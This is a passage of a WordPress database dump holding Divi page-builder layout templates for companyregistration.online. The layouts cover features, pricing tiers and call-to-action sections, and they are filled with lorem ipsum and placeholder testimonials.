text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Text Title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Text Title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Text Title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"||0px|\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#d7dce1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\n\n\n\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"120px||30px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_slider admin_label=\"Testimonials\" show_arrows=\"on\" show_pagination=\"on\" auto=\"off\" auto_ignore_hover=\"off\" parallax=\"off\" parallax_method=\"off\" remove_inner_shadow=\"on\" background_position=\"default\" background_size=\"contain\" hide_content_on_mobile=\"off\" hide_cta_on_mobile=\"off\" show_image_video_mobile=\"off\" header_text_color=\"#262e32\" body_text_color=\"#262e32\" custom_button=\"off\" button_letter_spacing=\"0\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_hover=\"0\" custom_css_slide_description=\"font-weight: 400;\" custom_css_slide_title=\"font-weight: 300;\" header_font=\"Roboto||||\" header_font_size=\"36\" body_font=\"Roboto||||\" body_font_size=\"20\" body_line_height=\"1.2em\" top_padding=\"0px\" bottom_padding=\"0px\"]\n\n[et_pb_slide heading=\"%22I use Testimonial Generator often. Great job, I will definitely be ordering again! I\'m good to go.%22\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" use_bg_overlay=\"off\" use_text_overlay=\"off\" alignment=\"center\" background_layout=\"dark\" allow_player_pause=\"off\" text_border_radius=\"3\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" header_line_height=\"1.5em\" header_line_height_tablet=\"1.2em\" header_line_height_phone=\"1.2em\"]\n<p style=\"text-align: center\"><img class=\"alignnone size-full wp-image-4854 aligncenter\" style=\"margin-top: 40px;margin-bottom: 10px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/05-1.png\" alt=\"05\" width=\"90\" height=\"90\" />Rick F.</p>\n[/et_pb_slide][et_pb_slide heading=\"%22This is unbelievable. After using Testiminial Generator my buisness skyrocketed!%22\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" use_bg_overlay=\"off\" use_text_overlay=\"off\" alignment=\"center\" background_layout=\"dark\" allow_player_pause=\"off\" text_border_radius=\"3\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" header_line_height=\"1.5em\" header_line_height_tablet=\"1.2em\" header_line_height_phone=\"1.2em\"]\n<p style=\"text-align: center\"><img class=\"alignnone size-full wp-image-4859\" style=\"margin-top: 40px;margin-bottom: 10px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/008.png\" alt=\"008\" width=\"90\" height=\"90\" /><br /> Mick A.</p>\n[/et_pb_slide]\n\n[/et_pb_slider][/et_pb_column][/et_pb_row][/et_pb_section]','Features','','publish','closed','closed','','features','','','2016-05-27 19:42:58','2016-05-27 17:42:58','',0,'https://companyregistration.online/et_pb_layout/features/',0,'et_pb_layout','',0),(5736,1,'2016-05-27 19:43:29','2016-05-27 17:43:29','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-top: 1px solid #D7DCE1;\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"101px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Simple pricing.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Simple pricing.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" background_color_1=\"#ffffff\" parallax_2=\"off\" parallax_method_2=\"off\" background_color_2=\"#ffffff\" parallax_3=\"off\" parallax_method_3=\"off\" background_color_3=\"#ffffff\" column_padding_mobile=\"on\" custom_css_main_1=\"border: 1px solid #D7DCE1\" custom_css_main_2=\"border: 1px solid #D7DCE1\" custom_css_main_3=\"border: 1px solid #D7DCE1\" custom_padding=\"60px|||\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#1ec4d6\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"58px|||\"]\n\n<p>Starter</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px|||\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\n\n<p>A beautiful simple<br /> lorem ipsum solution.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"72\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\"]\n\n<p>$8</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_text_color=\"#9fa9af\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"2px||38px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\n\n<p>Per user/month</p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"FREE TRIAL\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#9fa9af\" button_bg_color=\"#ffffff\" button_border_width=\"1\" button_border_color=\"#cfd4d7\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#30c2a2\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#30c2a2\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"38\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#7d75d9\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"58px|||\"]\n\n<p>Professional</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px|||\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\n\n<p>Perfect for lorem ipsum<br /> businesses of all size.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"72\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\"]\n\n<p>$18</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_text_color=\"#9fa9af\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"2px||38px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\n\n<p>Per user/month</p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"FREE TRIAL\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#9fa9af\" button_bg_color=\"#ffffff\" button_border_width=\"1\" button_border_color=\"#cfd4d7\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#30c2a2\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#30c2a2\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"38\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#3b67b3\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"58px|||\"]\n\n<p>Advanced</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px|||\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\n\n<p>Advanced features as<br /> your business grow.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"72\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\"]\n\n<p>$48</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_text_color=\"#9fa9af\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"2px||38px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\n\n<p>Per user/month</p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"FREE TRIAL\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#9fa9af\" button_bg_color=\"#ffffff\" button_border_width=\"1\" button_border_color=\"#cfd4d7\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#30c2a2\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#30c2a2\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"38\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||103px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:300;\"]\n\n<p>Notice: You can learn more about our <span style=\"text-decoration: underline\"><strong>Terms of Service</strong></span></p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Simple Pricing','','publish','closed','closed','','simple-pricing','','','2016-05-27 19:43:29','2016-05-27 17:43:29','',0,'https://companyregistration.online/et_pb_layout/simple-pricing/',0,'et_pb_layout','',0),(5737,1,'2016-05-27 19:44:16','2016-05-27 17:44:16','[et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#212a35\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"98px||90px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"104px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Limited Offer\" title=\"Limited time offer. Get 10 free stock images.\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"620px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"23px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#37414d\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"4px||90px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/042-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Find quick</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_02.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Jump start</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_03.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Make it amazing</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Limited Offer','','publish','closed','closed','','content-limited-time-offer-get-10-free-stock-images','','','2016-05-27 19:44:16','2016-05-27 17:44:16','',0,'https://companyregistration.online/et_pb_layout/content-limited-time-offer-get-10-free-stock-images/',0,'et_pb_layout','',0),(5738,1,'2016-05-27 19:44:32','2016-05-27 17:44:32','[et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#212a35\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"98px||90px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"104px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Ask more of your stock images\" title=\"Ask more of your stock images\" url_new_window=\"off\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"520px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"0px||40px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"0px|||\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/01_thumb2.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Find quick</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02_thumb3.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" 